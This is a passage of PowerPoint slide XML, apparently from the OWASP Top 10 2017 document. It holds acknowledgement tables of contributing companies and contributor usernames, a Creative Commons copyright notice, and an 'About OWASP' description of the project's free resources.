                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2705345571"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="440345039"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>MicroFocus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Fortify​</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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Veracode</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Synopsis​</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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Checkmarx</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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ContextIS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1420739054"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>CDAC​</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Hidden​</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Colegio</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> LaSalle Monteria​</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Linden Lab​</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ITsec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Security Services </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>bv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2702957963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>EZI​</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Edgescan</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Purpletalk</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AsTech</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Consulting​</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Network Test Labs Inc.​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2915751994"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Derek Weeks​</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TCS​</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Easybss</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I4 Consulting​</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ANCAP​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="324951646"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Branding Brand​</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Vantage Point​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EVRY​</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iBLISS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Digital Security​</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Shape Security​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1054797462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Paladion Networks</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Secure Network​</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Web​</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Contrast Security​</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Hamed​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1274230784"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Khallaagh</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DDoS.com​</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Minded Security​</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BUGemot</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Softtek​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1928526564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>M. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Limacher</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> IT</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Dienstleistungen</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Osampa</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Atos​</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National Center for Cyber Security Technology​</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SHCP​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="942100138"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A19514B-B0EA-4CF0-809D-97D7C4B7BBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1047685343"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228599" y="6248400"/>
          <a:ext cx="6400800" cy="2499360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3884102497"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3477021267"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1190969635"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2705345571"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="274320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t> ak47gen</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davewichers</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itscooper</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ossie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>-git</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tghosth</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20739054"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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alonergan</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drwetter</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jeremylong</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PauloASilva</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thesp0nge</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02957963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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anantshri</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ecbftw</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jmanico</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">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pontocom</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toddgrotenhuis</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15751994"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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bchurchill</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gilzow</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joaomatosf</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psiinon</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tsohlacol</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4951646"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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bkimminich</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h3xstream</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jrmithdobbs</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raesene</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vanderaj</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04800">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Boberski</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HoLyVieR</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jsteven</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riramar</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vdbaan</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54797462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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borischen</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ilatypov</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jvehent</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sslHello</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yohgaki</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74230784"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t> Calico90</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infosecdad</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koto</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stefanb</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Chris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t>Frohoff</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74320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t> D00gs</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irbishop</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Neil-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t>Smithline</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taprootsec</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Gabriel Lawrence</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spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11078437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00AD95-9F88-4DD0-B766-7519976466A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6887444" cy="91440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304771189"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="11430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54169">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0"/>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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883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a:t>Copyright © 2003 – 2017 The OWASP Foundation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a:t>This document is released under the Creative Commons Attribution Share-Alike 4.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="13716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9" name="Picture 2" descr="by-sa.png">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8522201"/>
            <a:ext cx="1046163" cy="366027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="489919879"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="992585"/>
          <a:ext cx="3352800" cy="6925861"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="390820">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Table of Contents</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6535041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>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950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Aria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441620203"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="6927847"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="374724">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> OWASP</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6553123">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>At OWASP you'll find free and open</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Application security tools and standards</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Complete books on application security testing, secure code development, and secure code review</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Presentations and videos</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cheat sheets on many common topics</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Standard security controls and libraries</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
